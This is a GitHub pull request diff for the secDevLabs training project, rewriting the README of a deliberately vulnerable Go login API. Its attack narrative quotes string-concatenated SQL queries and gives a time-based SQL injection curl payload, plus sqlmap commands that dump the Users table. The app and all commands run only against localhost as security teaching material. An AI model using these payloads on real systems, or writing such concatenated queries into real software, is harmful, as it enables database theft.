Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Update A1 - Copy-n-Paste README #165

Merged
merged 69 commits into from
May 21, 2019
Merged
Changes from 66 commits
Commits
Show all changes
69 commits
Select commit Hold shift + click to select a range
24b6dc0
[DOCS] Add attack into README
rafaveira3 Feb 10, 2019
86b6a54
[DOCS] Add index
vitoriario Feb 11, 2019
115681b
[FIX] Fix objectives link
vitoriario Feb 11, 2019
11144e2
[DOCS] Move attack pictures to images folder
vitoriario Feb 11, 2019
437d813
[DOCS] correct misspelling
vitoriario Feb 11, 2019
bc594a4
[FEAT] Redirect / to /login
vitoriario Feb 26, 2019
99789e0
Merge pull request #202 from vitoriario/redirect_login
rafaveira3 Feb 26, 2019
1d4046a
[FEAT] WIP: Add new A9 app Stegonography
Krlier Mar 17, 2019
f5712cf
Fix typo in README.md
Krlier Apr 1, 2019
b47041a
Merge branch 'master' of github.com:globocom/secDevLabs into Stegonog…
Krlier Apr 14, 2019
3cc941d
[FEAT] Stegonography first commit 🚀
Krlier Apr 14, 2019
076531c
[FEAT] Add README file
Krlier Apr 19, 2019
50f8045
[FEAT] Add attack narrative images
Krlier Apr 19, 2019
1bbbf50
[FEAT] Add admin's page
Krlier Apr 19, 2019
ff7d5dc
[FEAT] Change session token name
Krlier Apr 19, 2019
d48adbc
[REFACT] Change Stegonography from A9 to A6
Krlier Apr 19, 2019
5981d08
[FEAT] Update README.md
Krlier Apr 19, 2019
9db240c
[REFACT] Update README.md
Krlier Apr 23, 2019
ea40d63
Merge branch 'Stegonography' of github.com:globocom/secDevLabs into S…
Krlier Apr 23, 2019
8337eec
[REFACT] Move node_modules to app folder
Krlier May 2, 2019
1e51f73
[FEAT] Add dependencies to node_modules
Krlier May 2, 2019
bb5b6f5
[REFACT] Add mongodb to hold credentials
Krlier May 2, 2019
975786d
[DOCS] Update README file
Krlier May 2, 2019
93379f9
[FEAT] Add new routes
Krlier May 2, 2019
141f945
[FEAT] Update dependencies
Krlier May 2, 2019
a2ff06f
[DOCS] Update README
Krlier May 2, 2019
fb34c8a
[FIX] Logout route now clears cookie correctly
Krlier May 2, 2019
0d6e56b
Merge pull request #226 from globocom/Stegonography
spimpaov May 2, 2019
99757b4
[DOCS] Update README with new A6 app
Krlier May 2, 2019
46fee5d
Merge pull request #227 from globocom/Update-Readme
spimpaov May 2, 2019
00d71b5
[DOCS] Update README to have the Attack Narrative
Krlier May 9, 2019
be533c1
[DOCS] Remove ATTACK.md and move it's images
Krlier May 9, 2019
f4da66a
[DOCS] Update README to contemplate the Attack Narrative
Krlier May 9, 2019
c6b51af
[DOCS] Remove docs folder and move itsimages
Krlier May 9, 2019
7fd573e
[DOCS] Update README file to contemplate the Attack Narrative
Krlier May 9, 2019
ee0284d
[DOCS] Remove docs folder and move it's images
Krlier May 9, 2019
5f55be7
[DOCS] Update README to contemplate the Attack Narrative
Krlier May 9, 2019
43c4397
[DOCS] Remove docs folder and move it's images
Krlier May 9, 2019
0ca0519
[DOCS] Remove docs folder
Krlier May 9, 2019
0570df9
[FEAT] Add verbose response to successful login route
May 9, 2019
07de238
Merge pull request #233 from Takehime/a2-feat
Krlier May 9, 2019
0547d70
[DOCS] Update README file to contemplate the Attack Narrative
Krlier May 9, 2019
4916bc5
[DOCS] Remove the docs folder and move it's images
Krlier May 9, 2019
9cd95d1
Merge pull request #232 from globocom/A4-VinijrBlog-Update-Readme
spimpaov May 9, 2019
1e59c29
Merge pull request #229 from globocom/A2-Saidajaula-Update-README
spimpaov May 9, 2019
a0698da
Merge pull request #230 from globocom/A2-InsecureGoProject-Update-Readme
spimpaov May 9, 2019
65d630c
Merge pull request #231 from globocom/A3-SnakePro-Update-Readme
spimpaov May 9, 2019
aab1552
Merge pull request #234 from globocom/A5-EcommerceAPI-Update-Readme
spimpaov May 9, 2019
d2a22ac
[DOCS] Fix Objectives link
spimpaov May 13, 2019
f3f48d3
[DOCS] Fix Objectives link
spimpaov May 13, 2019
7e657d1
[DOCS] Fix Objectives link
spimpaov May 13, 2019
36d689d
[DOCS] Fix Objectives link
spimpaov May 13, 2019
0932cec
[DOCS] Fix Objectives link
spimpaov May 13, 2019
50415ab
[DOCS] Update A3 README
spimpaov May 13, 2019
457b093
[DOCS] Fix broken ink in A4 README
spimpaov May 13, 2019
39e9f65
Merge pull request #241 from globocom/fix-objectives
Krlier May 14, 2019
174c79d
[DOCS] Update README.md "objectives" link
Krlier May 14, 2019
c07b46f
Merge pull request #242 from globocom/fix-obj-a3
Krlier May 14, 2019
09f710c
Merge pull request #243 from globocom/fix-obj-a2
Krlier May 14, 2019
31ed41b
Merge pull request #244 from globocom/fix-obj-a4
Krlier May 14, 2019
1d77fee
Merge pull request #245 from globocom/fix-obj-a5
Krlier May 14, 2019
6ed317b
Merge pull request #246 from globocom/readme-a3
Krlier May 14, 2019
67a2030
Merge pull request #247 from globocom/readme-a4
Krlier May 14, 2019
b59689f
[DOCS] Remove docs folder
Krlier May 14, 2019
011c117
Merge branch 'change-a1-docs' of github.com:globocom/secDevLabs into …
Krlier May 14, 2019
c387924
[DOCS] Update README with A1 final version
Krlier May 14, 2019
43ce9ce
[DOCS] Fix typo in Readme
spimpaov May 20, 2019
31b0bed
[DOCS] Add payload in A1 Readme
spimpaov May 20, 2019
0ca3fdf
[DOCS] Fix typo
Krlier May 21, 2019
File filter

Filter by extension

Filter by extension


Conversations
Failed to load comments.
Loading
Jump to
The table of contents is too big for display.
Diff view
Diff view
  •  
  •  
  •  
3 changes: 2 additions & 1 deletion README.md
Original file line number Diff line number Diff line change
@@ -18,7 +18,7 @@ Now it's time to shield the application up! Imagine that this is your applicatio

## How secure is my new code?

After mitigating a vulnerability, you can send a Pull Request using to gently ask secDevLabs community to review your new secure code. If you're feeling a bit lost, try having a look at [this mitigation solution](https://github.com/globocom/secDevLabs/pull/29), it might help! 🚀
After mitigating a vulnerability, you can send a Pull Request to gently ask secDevLabs community to review your new secure code. If you're feeling a bit lost, try having a look at [this mitigation solution](https://github.com/globocom/secDevLabs/pull/29), it might help! 🚀

## OWASP Top 10 (2017) apps:

@@ -33,6 +33,7 @@ Disclaimer: You are about to install vulnerable apps in your machine! 🔥
| A4 - XML External Entities (XXE) | PHP | [ViniJr Blog](owasp-top10-2017-apps/a4/vinijr-blog) |
| A5 - Broken Access Control | Golang | [Vulnerable Ecommerce API](owasp-top10-2017-apps/a5/ecommerce-api) |
| A6 - Security Misconfiguration | PHP | [Vulnerable Wordpress Misconfig](owasp-top10-2017-apps/a6/misconfig-wordpress) |
| A6 - Security Misconfiguration | NodeJS | [Stegonography](owasp-top10-2017-apps/a6/stegonography) |
| A7 - Cross-Site Scripting (XSS) | Python | [Gossip World](owasp-top10-2017-apps/a7/gossip-world) |
| A8 - Insecure Deserialization | Python | [Amarelo Designs](owasp-top10-2017-apps/a8/amarelo-designs) |
| A9 - Using Components With Known Vulnerabilities | PHP | [Cimentech](owasp-top10-2017-apps/a9/cimentech) |
156 changes: 141 additions & 15 deletions owasp-top10-2017-apps/a1/copy-n-paste/README.md
Original file line number Diff line number Diff line change
@@ -1,40 +1,166 @@
# CopyNPaste API
> This is a simple Golang API that contains an example of an Injection vulnerability.

<img src="images/CopyNPaste.png" align="center"/>

## What is Injection?
CopyNPaste is Golang web application that uses an API and a simple front end to simulate a login page. It has both `/register` and `/login` routes that, by communicating with a MySQL database, enables users register and enter into a generic system.
Krlier marked this conversation as resolved.
Show resolved Hide resolved

## Index

Definition from [OWASP](https://www.owasp.org/images/7/72/OWASP_Top_10-2017_%28en%29.pdf.pdf):
- [Definition](#what-is-injection)
- [Setup](#setup)
- [Attack narrative](#attack-narrative)
- [Objectives](#secure-this-app)
- [Solutions](#pr-solutions)
- [Contributing](#contributing)

## What is Injection?

Injection flaws, such as SQL, NoSQL, OS, and LDAP injection, occur when untrusted data is sent to an interpreter as part of a command or query. The attacker’s hostile data can trick the interpreter into executing unintended commands or accessing data without proper authorization.

## Requirements
The main goal of this project is to discuss how **SQL Injection** vulnerabilities can be exploited and to encourage developers send Pull Requests to secDevLabs on how they would mitigate these flaws.

## Setup

To start this intentionally **insecure application**, you will need [Docker][Docker Install] and [Docker Compose][Docker Compose Install]. After forking [secDevLabs](https://github.com/globocom/secDevLabs), you must type the following commands to start:

```sh
cd secDevLabs/owasp-top10-2017-apps/a1/copy-n-paste
```

```sh
make install
```

To build this lab you will need [Docker][Docker Install] and [Docker Compose][Docker Compose Install].
Then simply visit [localhost:3000][App], as exemplified below:

<img src="images/CopyNPaste.png" align="center"/>

## Deploy and Run
## Get to know the app 💉

After cloning this repository, you can type the following command to start the vulnerable application:
To properly understand how this application works, you can follow these simple steps:

- Register a new user via front-end.
- Login as this user via front-end.
* Register another user now using command line:
```sh
$ make install
curl -s -H "Content-Type: application/json" -d '{"user":"bob", "pass":"password", "passcheck":"password"}' http://localhost:3000/register
```
* Login as this second user now using command line:
```sh
curl -s -H "Content-Type: application/json" -d '{"user":"bob", "pass":"password"}' http://localhost:3000/login

```

## Attack narrative

Now that you know the purpose of this app, what could possibly go wrong? The following section describes how an attacker could identify and eventually find sensitive information about the app or it's users. We encourage you to follow these steps and try to reproduce them on your own to better understand the attack vector! 😜

### 👀

#### Lack of input validation allows for remote code execution
Krlier marked this conversation as resolved.
Show resolved Hide resolved

After reviewing `NewUser()` , `CheckIfUserExists()` and `AuthenticateUser()` from [`db.go`]((https://github.com/globocom/secDevLabs/blob/master/owasp-top10-2017-apps/a1/copy-n-paste/app/util/db.go#)) file, it was possible to see that some input from users are concatenated with SQL queries, as shown in the following code snippets:

```go
query := fmt.Sprint("select * from Users where username = '" + user + "'")

```

```go
query := fmt.Sprint("insert into Users (username, password) values ('" + user + "', '" + passHash + "')")
```

```go
query := fmt.Sprint("select username from Users where username = '" + username + "'")
```

As no validation is being made on these variables, SQL injections may be successfully executed in the database. Using the web interface, we can send some information, using the form from "inspect page", to better understand how it communicates with the API.
Krlier marked this conversation as resolved.
Show resolved Hide resolved

<img src="images/attack-0.png" align="center"/>

To confirm the input field is vulnerable, the following payload could be used to test if a 5 seconds delay will be noted after sending it:
Krlier marked this conversation as resolved.
Show resolved Hide resolved

<img src="images/attack-1.png" align="center"/>

Using `curl` on CLI interface, we can test it again, this time with a larger 30 seconds delay:

```sh
curl -s -H "Content-Type: application/json" -d '{"user":"-1'\'' union select 1,2,sleep(30) -- ", "pass":"password"}' http://127.0.0.1:3000/login
```

Request:

<img src="images/attack-2.png" align="center"/>

30 seconds later, thus confirming we can execute commands on the server:

<img src="images/attack-3.png" align="center"/>

#### 🔥

An attacker could now create any malicious SQL queries and send them to the API that, in theory, would be executed. For the purpose of this attack narrative, [sqlmap](https://github.com/sqlmapproject/sqlmap) will be used to exemplify how an automated SQL Injection attack may be performed.
Krlier marked this conversation as resolved.
Show resolved Hide resolved

To install sqlmap on a Mac you can simply type:

```sh
brew install sqlmap
```

The first possible step is to create a file, `postRequest.txt`, containing the HTTP POST itself, as shown in the following code:

```sh
POST /login HTTP/1.1
Host: 127.0.0.1:3000
User-Agent: curl/7.54.0
Accept: */*
Content-Type: application/json
Content-Length: 31

{"user":"user", "pass":"password"}
```

Before executing the attack, you can open a new tab in your terminal and type the following command to observe how the malicious requests will be received by the app:

```sh
docker logs a1_api -f
```

After that, we can now use `-r` option and wait for sqlmap to perform multiples malicious requests until it finds the vulnerable parameter:

```sh
sqlmap -r postRequest.txt
```

<img src="images/attack-4.png" align="center"/>

After understanding how this database is structured, an attacker could use the following command to retrieve database details:

```sh
sqlmap -r postRequest.txt --tables
```

And then retrieve sensitive information from it:

```sh
sqlmap -r postRequest.txt -D a1db -T Users --dump
```

<img src="images/attack-5.png" align="center"/>

Then simply visit [localhost:3000][App] !
## Secure this app

## Attack Narrative
How could you now migitate this vulnerability? After your code modification, an attacker should not be able to:

To understand how this vulnerability can be exploited, check [this section](docs/ATTACK.md)!
* Run SQL queries in the database.

## Mitigating the vulnerability
## PR solutions

(Spoiler alert 🧐) To understand how this vulnerability can be mitigated, check [this other section](https://github.com/globocom/secDevLabs/pulls?q=is%3Apr+label%3A%22mitigation+solution+%F0%9F%94%92%22+label%3A%22CopyNPaste+API%22)!
[Spoiler alert] To understand how this vulnerability can be mitigated, check [these pull requests](https://github.com/globocom/secDevLabs/pulls?q=is%3Apr+label%3A%22mitigation+solution+%F0%9F%94%92%22+label%3A%22CopyNPaste+API%22)!

## Contributing

Yes, please. :zap:
We encourage you to contribute to SecDevLabs! Please check out the [Contributing to SecDevLabs](../../../docs/CONTRIBUTING.md) section for guidelines on how to proceed! 🎉

[Docker Install]: https://docs.docker.com/install/
[Docker Compose Install]: https://docs.docker.com/compose/install/
[App]: http://127.0.0.1:3000
[App]: http://localhost:3000
95 changes: 0 additions & 95 deletions owasp-top10-2017-apps/a1/copy-n-paste/docs/ATTACK.md

This file was deleted.

Loading